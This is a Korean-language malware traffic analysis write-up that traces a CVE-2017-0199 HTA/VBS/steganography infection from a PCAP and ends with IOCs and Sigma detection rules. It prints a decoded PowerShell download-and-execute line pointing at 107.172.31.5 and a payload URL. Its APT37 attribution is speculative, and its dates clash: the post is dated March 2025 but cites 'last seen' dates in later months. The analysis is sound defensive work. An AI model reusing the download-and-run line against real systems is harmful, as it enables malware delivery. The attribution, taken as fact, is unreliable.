
CVE-2017-0199 XLS --> HTA --> VBS --> 스테가노그래피 --> DBATLOADER/GULOADER 스타일의 악성코드
PCAP 기반 분석 | 날짜: 2025-03-12 | 작성자: BlackOclock
14.1 전체 공격 체인 요약
14.2 침해 지표 (IP, 해시, 도메인)
14.3 권장 사항
참고!!! 이 분석에서는 '오직' PCAP 파일만 사용했습니다! ZIP 파일은 필요하지 않았습니다.

그림 1: malware-traffic-analysis.net에서 다운로드한 소스 파일 - '오직' PCAP 파일을 사용했습니다.
2025-01-09 (목요일): CVE-2017-0199 XLS --> HTA --> VBS --> 스테가노그래피 --> DBATLOADER/GULOADER 스타일 멀웨어
2.1 프로토콜 계층 구조 – 큰 그림

트래픽의 큰 그림을 파악하기 위해 프로토콜 계층 구조부터 시작했습니다. 이는 사용된 각 프로토콜의 볼륨을 보여줍니다. 그림에서 볼 수 있듯이 TLS가 전체 트래픽의 82.4%를 차지합니다. 또한 Media Line 및 Line-Based 데이터도 존재합니다. 그러나 네트워크 활동을 더 잘 이해하려면 대화 및 엔드포인트를 검토해야 합니다.
2.2 대화 – 최다 통신자 및 데이터 전송

대화를 사용하여 가장 많은 데이터 전송이 발생한 IP 쌍을 탐지합니다. 분석 결과 10.9.1.101(호스트)과 104.17.201.1 사이의 트래픽 볼륨이 가장 높았습니다. 이 데이터 전송에는 80번과 443번 포트가 사용되었습니다. 또한 3MB의 데이터가 104.17.201.1에서 10.9.1.101(호스트)로 전송된 것을 확인할 수 있습니다. 또 다른 중요한 발견은 WAN IP(89.39.83.184)에서 발생한 21번 포트 연결로, 이는 잠재적인 유출을 시사합니다. 하지만 아직 이에 대해 잘 알지 못하므로 확실하지 않습니다. 증거가 필요합니다!
2.3 엔드포인트

엔드포인트를 사용하여 네트워크상의 최다 통신자를 식별합니다. 104.17.201.1은 3MB의 전송 데이터(Tx)를 가지고 있으며, 10.9.1.101도 3MB의 수신 데이터(Rx)를 가지고 있습니다. 또한, 최다 통신자는 소스가 104.17.201.1이고 대상이 10.9.1.101입니다.
2.4 HTTP 내보내기 객체

내보내기는 네트워크를 통해 전송된 파일, 데이터, 이메일 등을 식별하는 데 사용됩니다. PCAP을 분석할 때마다 여기에서 어떤 패킷에 어떤 데이터가 포함되어 있는지 확인해야 합니다. 88번, 132번, 2457번, 2468번 패킷을 확인했습니다.
2.5 HTTP Contains 필터

네트워크에 HTTP 프로토콜이 있는 경우 png, zip, jpg, jpeg(스테가노그래피)와 같은 미디어를 필터에서 확인해야 합니다. 공격자는 종종 미디어 파일에 악성 코드를 숨겨 안티바이러스 탐지를 우회하기 때문입니다.
#예제: http contains ".png" 또는 http contains ".jpg" 또는 http contains ".jpeg" 또는 http contains ".zip"
네트워크에서 80번 포트가 사용될 때 이 필터가 왜 중요한지 알 수 있습니다. 여기에는 47번 패킷에서 미디어 파일로 전송된 .hta가 있습니다. 그러나 내보내기를 사용하여 파일을 식별할 때는 존재하지 않았습니다.

PCAP에서 더 빠르게 식별하기 위해 NetworkMiner를 사용할 수 있습니다. REMnux 또는 Linux 시스템을 사용하는 경우 터미널에 (networkminer pcap_name)을 입력하면 됩니다.
프레임 = 47 파일명= seemebestthingsevermeetgivenbestthingsfornewways | 확장자 = .hta | 크기 = 47 KB | 소스 IP = 192.3.27.144 프레임 = 132 | 파일명= comonstraints | 확장자 = .vbs | 크기 = 223 KB | 소스 IP = 107.172.31.5 프레임 = 2457 | 파일명 = foeMMBIG | 확장자 = .txt | 크기= 325 KB | 소스 IP = 107.172.31.5

JA3 해시:
06843d66057fc9cbe42e9d690308903 (프레임 8)62136a81b5b727d039d8160d188863aa (프레임 14)3c4eb72b882d4d1442c67ce73f1292a9 (프레임 140)JA4 지문:
t13d1516h2_8daaf6152771_02713d6af862t13d201000_2b729b4bf63_29829a46703f그런데 JA4와 JA3 해시가 왜 필요할까요? JA3과 JA4가 무엇인지에 대한 질문이 있을 수 있습니다.
설명하자면; JA3과 JA4는 TLS 핸드셰이크의 매개변수를 기반으로 TLS 클라이언트와 서버를 지문 인식하는 기술입니다. JA3은 TLS 핸드셰이크의 Client Hello 패킷에 대한 MD5 해시를 생성하여 클라이언트 애플리케이션(예: 브라우저, 멀웨어)을 고유하게 식별합니다.
JA4는 최신 기술입니다. 인터넷 트래픽의 지문과 같습니다. 사람마다 고유한 지문이 있듯이, 인터넷에 연결되는 모든 소프트웨어는 고유한 흔적을 남깁니다. C2 서버를 찾는 데 더 유용합니다.
HTTP 트래픽에서 추출된 파일을 확인하기 위해 Zeek 로그를 사용했습니다. files.log에 다음 항목이 표시됩니다:
이 해시들은 이후 VirusTotal 조회에 사용되었습니다.

Hta (seemebestthing…)
MD5 e90ae8ec16ea2056caaa64ac13a31373 SHA1 8041abda3769b97d8e8b980c6a77fcd2829d715 SHA256 df215a01f6a83014a148c6e407cdc8422e9119a88b4220a1321b2986ea9aef63

MD5 3f691c4d5e1b53d16964d30e35863f77 SHA1 9ade8197b6f8828f384d5431a1d3a1b00e162782 SHA256 a666a99f2056082802f4597f180f891582a527324a16d34b4755ed63e5467882

MD5 9409dc8763c7d40af120ad693545ef98 SHA1 bec5f3f43449189ebf5dadf314288acace4828d7 SHA256 018648727f760e361eb4efa7f955a7815a197224c23016b321ab954767b45b82
여기서는 PCAP의 모든 파일을 데스크톱으로 내보내고 binwalk로 분석하겠습니다.

HTA 파일은 깨끗해 보입니다. 숨겨진 데이터를 찾을 수 없었습니다. 일반 텍스트 파일처럼 보입니다.
VBS 파일은 다릅니다. 그 안에서 두 가지를 찾았습니다:
일부 Base64 데이터와 HTML 문서 이는 VBS 파일에 여러 계층이 있음을 의미합니다. 공격자는 그 안에 코드를 숨기려고 했습니다.
TXT 파일에서 이상한 출력이 나왔습니다. "Broadcom header"라고 표시되는데, 텍스트 파일에는 어울리지 않습니다. 파일이 손상되었거나 내부에 다른 계층이 있을 수 있습니다. 더 이해하기 위해 샌드박스에서 실행해야 합니다.
샌드박스에서 HTA 파일을 실행했습니다. 결과는 다음과 같습니다:

HTA의 결과입니다. Triage에서 점수 8/10입니다.

5단계의 프로세스 체인: mshta.exe (PID 1080) 시작 cmd.exe (4952) 실행 cmd.exe가 powershell.exe (4424) 실행 PowerShell이 SeDebugPrivilege 활성화 (다른 프로세스에 접근하기 위해) WriteProcessMemory가 여러 번 사용되어 코드 인젝션 수행
인젝션 체인:
mshta.exe (1080) → cmd.exe (4952) → powershell.exe (4424) → csc.exe (4432) → 알 수 없는 프로세스 (3332)
PowerShell은 또한 실행 중인 프로세스를 확인(탐색)하고 시스템 언어를 확인(아마도 샌드박스 회피 목적)했습니다.
HTA에서 확인된 MITRE 기법:
T1059.001 (PowerShell) T1059.003 (cmd) T1057 (프로세스 탐색) T1134 (토큰 조작) T1055 (프로세스 인젝션) T1614.001 (언어 탐지)

cmd.exe에 의한 PowerShell 명령에서 FromString64Base를 확인할 수 있습니다. CyberChef에서 decode하여 base64 코드를 확인해야 합니다.

PowerShell 명령에서 Base64 문자열을 찾았습니다. CyberChef로 디코딩한 결과 다음을 확인했습니다:
URLDownloadToFile(0, "http://107.172.31.5/comonstraints.vbs", "...", 0, 0) Start-Sleep(3) Invoke-Expression "..."
즉, 107.172.31.5에서 comonstraints.vbs를 다운로드하고 3초 대기 후 실행한다는 의미입니다. 다음 단계에서 comonstraints.vbs가 다운로드됩니다.

VBS의 결과입니다. Triage에서 점수 10/10입니다.
프로세스 체인: Wscript.exe가 실행되고 PowerShell.exe를 실행했습니다.
그림에서 프로세스 내 코드를 확인하면 #x#.GIBMMeof/5.13.271.701//:p##h ----> 인코딩된 경로가 있습니다. http://107.172.31.5/foeMMBIG.txt (PCAP 내보내기에서 본 파일)
또한 이 사이트 https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg 는 JPG 내부에 악성 코드가 있습니다. JPG에는 <BASE64_START> 및 <BASE64_END> 태그가 있습니다. 그 사이에 숨겨진 코드가 있다는 의미입니다. 숨겨진 텍스트는 실제로 Base64이지만 거꾸로 작성되었습니다. 스크립트는 먼저 이를 뒤집은 다음 디코딩합니다. 디코딩 후 작은 프로그램(.NET 어셈블리)이 되어 컴퓨터에서 실행됩니다.
JPG를 다운로드하려고 시도했습니다.

하지만 얻을 수 없었습니다. 이 주소가 닫혔을 수도 있습니다. VBS 파일은 그림을 다운로드하고, 그 안에 숨겨진 코드를 찾아 수정한 후 실행합니다. 이를 스테가노그래피(이미지 내부에 데이터 숨기기)라고 합니다.
MITRE 기법:
T1012 - 레지스트리 쿼리 T1082 - 시스템 정보 탐색 T1055 - 프로세스 인젝션 T1057 – 프로세스 탐색 T1134 – 액세스 토큰 조작

이는 foeMMBIG.txt가 실제로 랜섬웨어 드로퍼임을 확인시켜 줍니다.
MITRE 기법:
7.1 프로세스 트리
mshta.exe (1080) → cmd.exe (4952) → powershell.exe (4424) → csc.exe (4432) → Notepad.exe (4600)
7.2 WriteProcessMemory 이벤트
PID 1080 (mshta.exe)은 PID 4952 (cmd.exe)에 쓰기 PID 4952 (cmd.exe)는 PID 4424 (powershell.exe)에 쓰기 PID 4424 (powershell.exe)는 PID 4432 (csc.exe)에 쓰기 PID 4432 (csc.exe)는 PID 3332 (알 수 없음)에 쓰기
7.3 토큰 조작
PowerShell (PID 4424)이 SeDebugPrivilege를 활성화하여 다른 프로세스에 접근할 수 있게 했습니다.
멀웨어가 실행될 때 샌드박스는 PowerShell(PID 4424)의 메모리 스냅샷을 찍었습니다. 이 스냅샷은 해당 시점의 컴퓨터 RAM 내용을 저장합니다.
20개 이상의 메모리 덤프 파일을 찾았습니다.

VBS 파일(WScript.exe, PID 1184에 의해 실행)도 메모리 덤프를 생성했습니다. 이 덤프들은 대부분 크기가 64KB입니다. 이는 작은 할당의 경우 정상입니다. 그러나 Notepad.exe(PID 4600)의 메모리 덤프는 확인되지 않았습니다. Notepad가 foeMMBIG.txt를 여는 데 사용되었다는 점을 고려하면 흥미로운 점입니다.

2개의 IP에서만 Jarm이 출력되었습니다.
NetworkMiner에서 JA4 지문을 추출하여 GreyNoise에서 검색했습니다. 동일한 JA4 지문을 가진 26개의 IP가 악성으로 플래그 지정되었습니다. 그런 다음 Shodan에서 이 모든 IP를 검색하여 열린 포트와 서비스를 확인했습니다.
이 목록은 GreyNoise를 확인하여 생성되었으며, 이 IP들은 GreyNoise에서 악성으로 플래그 지정되었습니다.
34.122.147.229 ( 웹 애플리케이션 무차별 대입 로그인 시도 - 출처 Guardpot 기준 - 7개월 전 이 IP는 2개의 서로 다른 공격 유형에 걸쳐 1222개의 이벤트에 연루되었습니다. 공격: tcp-portscan (1177), fortinet-login (45). 최초 발견: 2024-05-07 23:10 UTC, 마지막 발견: 2025-07-17 17:28 UTC. 3/94 보안 벤더가 이 IP 주소를 악성으로 플래그 지정했습니다. Not After: 2020-11-30 22:10:40 )
107.189.1.175 - Shodan 결과 C: Luxembourg Org : Buy VM 열린 포트: 80 / 443 / 9001 / 9030
104.197.69.115( 웹 애플리케이션 무차별 대입 로그인 시도 - 출처 Guardpot 기준 - 5개월 전 이 IP는 2개의 서로 다른 공격 유형에 걸쳐 1159개의 이벤트에 연루되었습니다. 공격: tcp-portscan (1124), fortinet-login (35). 최초 발견: 2024-07-11 04:26 UTC, 마지막 발견: 2025-09-25 12:08 UTC. 4/94 보안 벤더가 이 IP 주소를 악성으로 플래그 지정했습니다. )
34.72.176.129 ( 웹 애플리케이션 무차별 대입 로그인 시도 - 출처 Guardpot 기준 - 5개월 전 이 IP는 2개의 서로 다른 공격 유형에 걸쳐 1233개의 이벤트에 연루되었습니다. 공격: tcp-portscan (1201), fortinet-login (32). 최초 발견: 2024-07-11 04:26 UTC, 마지막 발견: 2025-09-25 12:12 UTC. CrowdSec CTI에서 추가 정보 확인 - 출처 CrowdSec 기준 - 1년 전 행위: Exploitation attempt / HTTP Bruteforce / HTTP Crawl + 2개 추가. 자세한 내용은 CrowdSec CTI에서 확인 6/94 보안 벤더가 이 IP 주소를 악성으로 플래그 지정했습니다.
34.123.170.104 ( 웹 애플리케이션 무차별 대입 로그인 시도 - 출처 Guardpot 기준 - 1개월 전 이 IP는 3개의 서로 다른 공격 유형에 걸쳐 1141개의 이벤트에 연루되었습니다. 공격: tcp-portscan (1097), fortinet-login (42), web-login (2). 최초 발견: 2024-05-23 14:07 UTC, 마지막 발견: 2026-01-26 05:22 UTC. CrowdSec CTI에서 추가 정보 확인 - 출처 CrowdSec 기준 - 1년 전 행위: HTTP Crawl / HTTP DoS / HTTP Exploit + 1개 추가. 자세한 내용은 CrowdSec CTI에서 확인 ) 3/94 보안 벤더가 이 IP 주소를 악성으로 플래그 지정했습니다.
121.127.42.69 ( 3/94 보안 벤더가 이 IP 주소를 악성으로 플래그 지정했습니다.)
185.220.101.2 Shodan 결과 ( 호스트명:berlin01.tor-exit.artikel10.org 국가 : 독일 조직: Artikel10 e.V. ISP : Stiftung Erneuerbare Freiheit (TOR입니다) 포트 : 80/443/9001/9002
185.220.101.162 ( 호스트명: tor-exit-162.relayon.org 국가 : 독일 / 조직:CIA TRIAD SECURITY LLC ISP : Stiftung Erneuerbare Freiheit)
205.169.39.24 네트워크 포트 스캐닝 및 정찰 - 출처 Guardpot 기준 - 8개월 전 이 IP는 1개의 서로 다른 공격 유형에 걸쳐 86개의 이벤트에 연루되었습니다. 공격: tcp-portscan (86). 최초 발견: 2024-08-22 22:29 UTC, 마지막 발견: 2025-07-04 17:29 UTC.
47.254.76.66 ( 클라우드 제공자 : Alibaba Cloud 국가 : 미국 열린 포트 : 22 운영 체제 : Linux
47.251.118.89 (클라우드 제공자 : Alibaba Cloud 국가 : 미국 열린 포트 : 22 운영 체제 : Linux)
107.189.12.7( 호스트명 : tor.privatebrowsing.org 국가 룩셈부르크 열린 포트: 80)
47.88.18.245 ( 국가 미국 OS: Linux 열린 포트 : 22)
79.127.248.2 ( 4/94 보안 벤더가 이 IP 주소를 악성으로 플래그 지정했습니다. 국가 미국)
185.126.82.201( 국가 : 미국 포트 : 1080)
45.92.19.139 (국가 : 미국 포트 : 59511)
47.251.186.126( 국가 : 미국 포트 : 22)
79.127.221.66 (국가 : 미국 포트 : 1080)
89.39.83.184를 확인하면 해당 IP가 호스트와 21번 포트로 연결되어 있음을 알 수 있습니다. 21번 FTP 패킷 중 하나를 클릭하고 Follow --- > TCP STREAM을 선택하면 공격자의 이메일과 비밀번호를 볼 수 있습니다.

NetworkMiner에서 파일을 확인하면 2498(PW_user1_DESKTOP.html) 및 2516(Contacts_Thunder.txt) 패킷 번호가 있습니다. 해당 파일을 내보낸 후 피싱 공격(추정) 또는 계정 탈취에 사용될 수 있는 사용자 이름과 비밀번호 정보가 있습니다.

공격자의 인프라에 대해 더 알아보기 위해 Shodan에서 FTP 서버 IP(89.39.83.184)를 검색했습니다.

12.1 VirusTotal 및 MalwareBazaar 결과
Zeek 로그(섹션 4)에서 얻은 해시를 VirusTotal 및 MalwareBazaar에서 확인했습니다. 모든 파일이 악성으로 확인되었습니다.
HTA 파일: 33/61 탐지, AgentTesla로 식별됨 VBS 파일: 31/62 탐지, AgentTesla / Talu로 식별됨 TXT 파일: 25/62 탐지, Zapchast / Bhgd (랜섬웨어 드로퍼)로 식별됨
전체 해시 목록은 섹션 14.2를 참조하십시오.
12.2 MITRE ATT&CK 매핑
T1059.001 - PowerShell T1059.003 - cmd T1134 - 토큰 조작 T1614.001 - 언어 탐지 T1012 - 레지스트리 쿼리 T1082 - 시스템 정보 탐색 T1055 - 프로세스 인젝션 T1057 – 프로세스 탐색
12.3 APT37 (ScarCruft) 연관성
이 공격이 왜 APT37처럼 보일까요?
이 공격에서 확인된 사항 - APT37이 알려진 것 공격 시작에 HTA 파일 사용 - APT37이 HTA 파일을 많이 사용함 Base64 명령어가 포함된 PowerShell - APT37이 PowerShell을 선호함 스테가노그래피 (숨겨진 코드가 있는 JPG) - APT37이 이미지에 코드를 숨김 프로세스 인젝션 (mshta → cmd → powershell → csc) - APT37이 신뢰할 수 있는 프로세스에 코드 주입 탈취된 데이터의 FTP 유출 - APT37이 자격 증명과 파일을 탈취함 마지막 단계의 랜섬웨어 - APT37이 최근 랜섬웨어도 사용함 유럽이 표적일 가능성 - APT37이 유럽에서 활동함 결론 이 공격에서 확인된 기법들은 APT37이 일반적으로 사용하는 것과 일치합니다. 100% 확실한 증거는 아니지만 APT37처럼 보입니다. 북한 해커 그룹이 이 공격의 배후일 가능성이 높습니다.
title: PowerShell 내 SeDebugPrivilege description: SeDebugPrivilege를 활성화하는 PowerShell 탐지 (가능한 토큰 조작) logsource: category: process_creation product: windows detection: selection: Image|endswith: '\powershell.exe' CommandLine|contains: 'SeDebugPrivilege' condition: selection
title: FTP 유출 description: FTP를 사용해서는 안 되는 프로세스의 FTP 연결 탐지 logsource: category: network_connection product: windows detection: selection: Image|endswith: - '\powershell.exe' - '\cmd.exe' - '\wscript.exe' DestinationPort: 21 condition: selectiontitle: PowerShell 다운로드 description: 인터넷에서 파일을 다운로드하는 PowerShell 탐지 logsource: category: process_creation product: windows detection: selection: Image|endswith: '\powershell.exe' CommandLine|contains|all: - 'URLDownloadToFile' - 'http' condition: selection
title: Temp 폴더의 Notepad description: Temp 폴더에서 Notepad가 파일을 여는 것을 탐지 (가능한 프로세스 인젝션) logsource: category: process_creation product: windows detection: selection: Image|endswith: '\notepad.exe' CommandLine|contains: '\Temp' condition: selection
참고! 기초적인 내용이지만 sigma 규칙을 배우려는 단계입니다.
##14. 결론 및 IOCs
14.1 전체 공격 체인 요약
감염은 192.3.27.144에서 다운로드된 악성 HTA 파일로 시작되었습니다. 열리면 다음과 같은 프로세스 체인이 실행되었습니다.
mshta.exe → cmd.exe → powershell.exe → csc.exe → Notepad.exe
주요 발견 사항:
<BASE64_START>와 <BASE64_END> 태그 사이에 숨겨진 Base64 데이터가 포함되어 있었습니다.
스크립트는 이 데이터를 추출하고, 역순으로 뒤집은 후 .NET 어셈블리로 디코딩했습니다. 이 어셈블리는 메모리에 로드되어 실행되었습니다. 비록 JPG를 다운로드할 수 없었지만(401 오류), 코드는 이것이 최종 페이로드(foeMMBIG.txt)를 다운로드하는 메커니즘이었음을 강력히 시사합니다.위협 행위자: APT37 – 알려진 TTP와 일치
14.2 침해 지표
IP 주소:
IP = 107.172.31.5 | 역할 = C2 서버 (VBS, TXT 다운로드) IP = 89.39.83.184 | 역할 = FTP 유출 서버 IP = 192.3.27.144 | 역할 = HTA 다운로드 소스 IP = 104.17.201.1 | 역할 = 첫 번째 단계 다운로드 (3 MB) GreyNoise에서 수집한 25개의 악성 IP | 전체 목록은 9.2절 참조
도메인:
Domain = res.cloudinary.com 역할 = 스테가노그래피 (숨겨진 코드가 있는 JPG) Domain = ip-api.com Filename= index.B23BDC8E.txt(false) 역할 = 샌드박스 우회 확인
파일 해시:
(seemebestthing…).hta MD5 e90ae8ec16ea2056caaa64ac13a31373 SHA1 8041abda3769b97d8e8b980c6a77fcd2829d715 SHA256 df215a01f6a83014a148c6e407cdc8422e9119a88b4220a1321b2986ea9aef63
comostraints.vbs MD5 3f691c4d5e1b53d16964d30e35863f77 SHA1 9ade8197b6f8828f384d5431a1d3a1b00e162782 SHA256 a666a99f2056082802f4597f180f891582a527324a16d34b4755ed63e5467882
foeMMBIG.txt MD5 9409dc8763c7d40af120ad693545ef98 SHA1 bec5f3f43449189ebf5dadf314288acace4828d7 SHA256 018648727f760e361eb4efa7f955a7815a197224c23016b321ab954767b45b82
FTP 자격 증명:
14.3 권장 사항
185.241.208.136 ( 국가: 폴란드 호스트명 ns2.rdp.rs 열린 포트 : 111/8440/9001)
47.89.246.29 ( 국가 : 미국 포트 : 22)
185.220.101.110 ( 호스트명: tor-exit-110.digitalcourage.de 열린 포트 : 80/123/443/8080)
5.77.252.202 ( 호스트명 :host-202.252.77.5.ucom.am 국가 : 아르메니아 열린 포트 : 1701/8291)
124.198.132.172(Tor) ( 국가 : 미국 열린 포트 : 111/8110/9001)
185.220.101.9 (Tor) ( 호스트명 : berlin01.tor-exit.artikel10.org 국가 : 폴란드 열린 포트 : 80/443/9001/9002)
213.230.93.13 ( 4/94 보안 벤더가 이 IP 주소를 악성으로 플래그 지정했습니다. 국가 : 우즈베키스탄)
138.199.140.203 ( 호스트명 :static.203.140.199.138.clients.your-server.de 국가 : 독일 열린 포트 : 22 / 8080 / 8443 / 9090/ 9100 / 10000 / 10250)